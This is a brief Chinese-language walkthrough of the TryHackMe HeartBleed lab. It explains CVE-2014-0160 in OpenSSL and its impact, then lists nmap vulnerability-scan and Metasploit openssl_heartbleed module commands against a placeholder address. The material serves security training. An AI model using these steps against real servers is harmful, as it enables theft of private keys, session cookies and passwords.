TryHackMe-HeartBleed

在线靶场链接:TryHackMe-HeartBleed

背景资料:
HeartBleed
OpenSSL-BUG
Heartbleed-Bug-exp

弱点在于OpenSSL的实现,而不是SSL/TLS协议本身,所以除了OpenSSL之外的其他TLS实现方式都不受影响。

影响版本:OpenSSL 1.0

编号:CVE-2014-0160

漏洞出现原因:缓冲区过读,没有对输入进行适当的验证(边界检查)

危害:

  • 服务器私钥被盗
  • 用户会话cookie被盗
  • 密码被盗

影响:

  • Linux基金会联合各大硅谷巨头成立核心基础架构联盟,为全球信息基础架构中的关键要素提供资金帮助.
  • Google成立了Project Zero.

nmap -sV -p- –script vuln 0.0.0.0
nmap

打开msf

1
2
3
4
msfconsole
search heartbleed
use auxiliary/scanner/ssl/openssl_heartbleed
show options

search-heartbleed

options

1
2
set rhost 0.0.0.0
set verbose true

get